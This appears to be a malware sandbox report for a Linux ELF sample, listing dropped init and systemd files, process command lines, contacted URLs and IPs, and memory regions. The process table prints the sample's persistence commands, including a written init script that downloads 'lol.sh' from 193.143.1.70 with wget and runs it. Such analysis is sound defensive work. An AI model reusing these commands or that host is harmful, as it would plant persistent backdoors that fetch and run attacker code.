Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
x86_32.nn.elf
|
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sh
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/x86_32.nn.elf
|
/tmp/x86_32.nn.elf
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget
http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n
killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sh
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sh /etc/rc.d/S99sh
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 41 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
145.253.121.198
|
unknown
|
Germany
|
||
|
27.36.157.237
|
unknown
|
China
|
||
|
186.107.146.41
|
unknown
|
Chile
|
||
|
178.46.243.223
|
unknown
|
Russian Federation
|
||
|
45.125.17.101
|
unknown
|
China
|
||
|
36.110.227.13
|
unknown
|
China
|
||
|
61.129.176.191
|
unknown
|
China
|
||
|
17.122.66.133
|
unknown
|
United States
|
||
|
190.197.161.66
|
unknown
|
Argentina
|
||
|
7.51.34.44
|
unknown
|
United States
|
||
|
2.71.158.20
|
unknown
|
Sweden
|
||
|
182.220.41.182
|
unknown
|
Korea Republic of
|
||
|
111.192.67.220
|
unknown
|
China
|
||
|
131.133.93.24
|
unknown
|
Canada
|
||
|
49.249.35.230
|
unknown
|
India
|
||
|
12.35.148.59
|
unknown
|
United States
|
||
|
178.211.143.68
|
unknown
|
Ukraine
|
||
|
214.106.9.165
|
unknown
|
United States
|
||
|
197.78.70.189
|
unknown
|
South Africa
|
||
|
41.186.113.201
|
unknown
|
Rwanda
|
||
|
121.37.54.228
|
unknown
|
China
|
||
|
35.26.50.217
|
unknown
|
United States
|
||
|
94.185.194.177
|
unknown
|
United Kingdom
|
||
|
4.78.126.126
|
unknown
|
United States
|
||
|
25.198.210.161
|
unknown
|
United Kingdom
|
||
|
181.242.97.84
|
unknown
|
Colombia
|
||
|
34.205.125.198
|
unknown
|
United States
|
||
|
64.196.203.35
|
unknown
|
United States
|
||
|
170.188.17.162
|
unknown
|
United States
|
||
|
43.194.47.118
|
unknown
|
Japan
|
||
|
4.46.134.251
|
unknown
|
United States
|
||
|
57.168.167.114
|
unknown
|
Belgium
|
||
|
173.162.6.53
|
unknown
|
United States
|
||
|
92.155.33.181
|
unknown
|
France
|
||
|
183.146.210.255
|
unknown
|
China
|
||
|
216.147.168.119
|
unknown
|
United States
|
||
|
96.68.116.178
|
unknown
|
United States
|
||
|
156.22.108.146
|
unknown
|
Australia
|
||
|
181.20.183.123
|
unknown
|
Argentina
|
||
|
6.158.192.141
|
unknown
|
United States
|
||
|
217.136.177.128
|
unknown
|
Belgium
|
||
|
95.78.50.40
|
unknown
|
Russian Federation
|
||
|
131.90.133.194
|
unknown
|
United States
|
||
|
191.68.144.1
|
unknown
|
Colombia
|
||
|
74.107.225.250
|
unknown
|
United States
|
||
|
16.39.162.23
|
unknown
|
United States
|
||
|
207.107.177.50
|
unknown
|
Canada
|
||
|
115.152.105.177
|
unknown
|
China
|
||
|
109.137.255.228
|
unknown
|
Belgium
|
||
|
58.29.152.107
|
unknown
|
Korea Republic of
|
||
|
144.32.211.64
|
unknown
|
United Kingdom
|
||
|
11.172.37.79
|
unknown
|
United States
|
||
|
194.105.35.124
|
unknown
|
Malta
|
||
|
91.141.145.12
|
unknown
|
Netherlands
|
||
|
129.200.252.43
|
unknown
|
United States
|
||
|
21.2.29.161
|
unknown
|
United States
|
||
|
63.66.67.109
|
unknown
|
United States
|
||
|
161.146.198.34
|
unknown
|
Australia
|
||
|
125.222.231.233
|
unknown
|
China
|
||
|
28.204.61.96
|
unknown
|
United States
|
||
|
149.94.194.10
|
unknown
|
United States
|
||
|
99.133.71.241
|
unknown
|
United States
|
||
|
58.156.15.78
|
unknown
|
Japan
|
||
|
65.120.222.49
|
unknown
|
United States
|
||
|
31.174.126.113
|
unknown
|
Poland
|
||
|
207.107.153.88
|
unknown
|
Canada
|
||
|
158.100.166.41
|
unknown
|
United States
|
||
|
167.198.146.226
|
unknown
|
United States
|
||
|
80.158.166.234
|
unknown
|
Germany
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
69.60.182.53
|
unknown
|
United States
|
||
|
106.103.13.214
|
unknown
|
Korea Republic of
|
||
|
20.196.77.32
|
unknown
|
United States
|
||
|
173.109.50.169
|
unknown
|
United States
|
||
|
185.24.113.106
|
unknown
|
Russian Federation
|
||
|
145.230.203.214
|
unknown
|
Germany
|
||
|
134.71.224.184
|
unknown
|
United States
|
||
|
150.192.118.90
|
unknown
|
United States
|
||
|
34.168.148.76
|
unknown
|
United States
|
||
|
136.192.94.138
|
unknown
|
United States
|
||
|
149.156.141.163
|
unknown
|
Poland
|
||
|
99.242.110.227
|
unknown
|
Canada
|
||
|
75.138.235.210
|
unknown
|
United States
|
||
|
220.200.134.62
|
unknown
|
China
|
||
|
45.16.50.75
|
unknown
|
United States
|
||
|
32.250.234.111
|
unknown
|
United States
|
||
|
38.163.157.86
|
unknown
|
United States
|
||
|
22.64.5.82
|
unknown
|
United States
|
||
|
176.96.33.204
|
unknown
|
Poland
|
||
|
49.61.81.161
|
unknown
|
Korea Republic of
|
||
|
183.133.215.71
|
unknown
|
China
|
||
|
214.117.155.217
|
unknown
|
United States
|
||
|
178.116.229.194
|
unknown
|
Belgium
|
||
|
15.80.106.77
|
unknown
|
United States
|
||
|
72.107.26.73
|
unknown
|
United States
|
||
|
101.55.144.96
|
unknown
|
Japan
|
||
|
81.201.13.132
|
unknown
|
Italy
|
||
|
157.101.149.232
|
unknown
|
Japan
|
||
|
171.110.221.247
|
unknown
|
China
|
||
|
26.21.180.214
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8060000
|
page execute read
|
|
||
|
8060000
|
page execute read
|
|
||
|
970b000
|
page read and write
|
|||
|
8061000
|
page read and write
|
|||
|
ffb24000
|
page read and write
|
|||
|
9710000
|
page read and write
|
|||
|
ffb24000
|
page read and write
|
|||
|
f7f9e000
|
page execute read
|
|||
|
f7f9e000
|
page execute read
|
|||
|
970b000
|
page read and write
|
|||
|
8061000
|
page read and write
|
|||
|
8063000
|
page read and write
|
|||
|
8063000
|
page read and write
|
There are 3 hidden memdumps, click here to show them.